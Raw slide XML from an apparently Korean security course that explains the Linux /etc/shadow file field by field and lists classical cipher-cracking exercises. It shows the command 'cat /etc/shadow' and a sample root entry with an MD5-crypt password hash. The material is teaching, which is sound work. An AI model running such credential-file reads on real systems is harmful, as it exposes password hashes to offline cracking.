        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8657519" y="4743760"/>
            <a:ext cx="2710626"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7" name="직선 화살표 연결선 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2719489B-3E22-4811-9040-B735E31E7350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="49" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6083557" y="4231632"/>
            <a:ext cx="2407304" cy="51212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10" descr="문서 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D24071E-C01F-4A53-8413-CAD834AE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616" y="4560958"/>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문서 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06DA7752-46CB-4B0D-9A3A-C3082E582D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732" y="519638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그림 1039">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{603C50B6-2E5A-45AF-9C5D-6211738D906B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="378904" y="3674359"/>
            <a:ext cx="2879373" cy="1758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4" name="직선 화살표 연결선 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF59DC73-C402-480B-AD63-14F70DF69BE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3362837" y="3181676"/>
            <a:ext cx="538256" cy="41100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말풍선: 모서리가 둥근 사각형 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AACA186-B671-4601-A1BA-6CB55F16DB4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4942110" y="3050517"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05892AB-E9CE-4C44-B497-979560A8FDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8060241" y="2357071"/>
            <a:ext cx="3123922" cy="1649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말풍선: 모서리가 둥근 사각형 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF8D085-E500-41A4-A7D9-B39E716F193A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8720305" y="1690688"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="그룹 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D1BACE3-BEEE-477E-8F9F-8DD916B28B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="사각형: 둥근 모서리 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E25ECD-9CD2-480C-93C8-A542AFCD281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3BC82237-1A5F-43EE-AD60-262FF23B560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9" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF0C0AD-C002-42EC-91C6-ACA773360B2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070609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/Theory/T3/Passwd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패스워드 구조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– shadow</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11E49470-FC9A-4ED5-ABA6-3825AB4E4AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4068998985"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1192960" y="11080626"/>
          <a:ext cx="9804064" cy="4160520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9804064">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3393743844"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1.Login Name </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사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>계정각</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 항목별 구분은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콜론</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으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>구분되어있으며</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 콜론과 콜론 사이 각 필드에는 다음과 같은 구조로 구성되어 있습니다</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2.Encrypted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패스워드를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>암호화시킨</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 값</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>3.Last Changed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1970</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>년부터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월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일부터 패스워드가 수정된 날짜의 일수를 계산</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4.Minimum</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패스워드가 변경되기 전 최소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5.Maximum</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변경 전 최대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6.Warn</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사용 만기일 전에 경고 메시지를 제공하는 일수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7.Inactive</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접속 차단 일 수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8.Expire</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사용을 금지하는 일 수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월</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연도</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9.Reserved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사용되지 않음</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47EE378-C0DD-4D6D-B89A-E9E5E123BF2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772656" y="1869607"/>
            <a:ext cx="6128297" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="707070"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>root:$1$40iCUjyd$0Iw3tsXLvCt.cv4YK4E0s1:17374:0:99999:7:::</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{144FBBCC-46D3-404F-8CE0-820A366C4B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617665" y="1869607"/>
            <a:ext cx="1975031" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cat /etc/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="14" name="표 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824E5CA0-0F72-495F-B863-F7E9D9E5C055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607302397"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="944680" y="2417858"/>
          <a:ext cx="9931230" cy="4160520"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="9931230">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3393743844"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1.Login Name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root</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사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>계정각</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 항목별 구분은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콜론</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으로 구분 되어 있으며</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 콜론과 콜론 사이 각 필드에는 다음과 같은 구조로 구성되어 있습니다</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2.Encrypted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 ~ </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패스워드를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>암호화시킨</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 값 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Hashid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> $Salt $Hash </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>vlaue</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>3.Last Changed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17374</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1970</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>년부터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월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일부터 패스워드가 수정된 날짜의 일수를 계산</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4.Minimum</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0</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패스워드가 변경되기 전 최소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5.Maximum</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99999</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변경 전 최대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6.Warn</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7</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사용 만기일 전에 경고 메시지를 제공하는 일수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7.Inactive</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접속 차단 일 수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8.Expire</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사용을 금지하는 일 수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월</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연도</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9.Reserved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사용되지 않음</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19192365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670454776"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3693381" y="2564266"/>
          <a:ext cx="3088419" cy="1723200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1272319">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1816100">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Ceasar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암호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Substitution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Vigenere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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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CeasarDeep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암호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SubstitutionDeep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 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
        <p:nvSpPr>
          <p:cNvPr id="8" name="화살표: 오른쪽 7">
            <a:hlinkClick r:id="rId5"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253B45D2-92D5-49A8-BEEC-BF9530AA6EF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B08F2D7E-21E1-4F2E-B34D-2ED1F6F379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903324B-10BF-4AFB-84FA-461273F64E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40B2706A-8F0F-4C9A-8CFA-00C0793F18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807688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2027207251"/>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암호 기술 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고전암호 크래킹</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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카이사르 암호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치환암호</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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 암호</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36146124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1614317402"/>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암호 실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>시저</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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</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암호 실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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암호 실습</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269155675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 name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084E3E52-14B5-4D47-8E83-1D9C5B775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440" y="2617876"/>
